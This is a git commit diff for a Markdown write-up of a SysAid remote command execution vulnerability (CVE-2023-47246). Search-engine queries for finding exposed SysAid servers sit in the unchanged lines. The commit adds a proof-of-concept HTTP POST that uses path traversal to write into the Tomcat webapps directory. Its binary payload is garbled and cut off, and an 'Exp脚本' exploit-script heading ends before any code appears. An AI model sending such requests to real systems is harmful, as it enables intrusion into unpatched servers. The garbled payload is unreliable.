Update SysAid远程命令执行漏洞(CVE-2023-47246).md
This commit is contained in:
parent
52bc275f0c
commit
13b5cb8f90
@ -10,6 +10,24 @@ shodan:http.favicon.hash:1540720428
|
||||
zoomeye:app:"SysAid On-Prem Software"
|
||||
hunter.how:favicon_hash="5f30870725d650d7377a134c74f41cfd"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /userentry?accountId=/../../../tomcat/webapps/UIHM3/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 87
|
||||
|
||||
xðffa``à`H*ç©«¿Áä±
|
||||
```
|
||||

|
||||
|
||||

|
||||
|
||||
## Exp脚本
|
||||
|
||||
```python
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user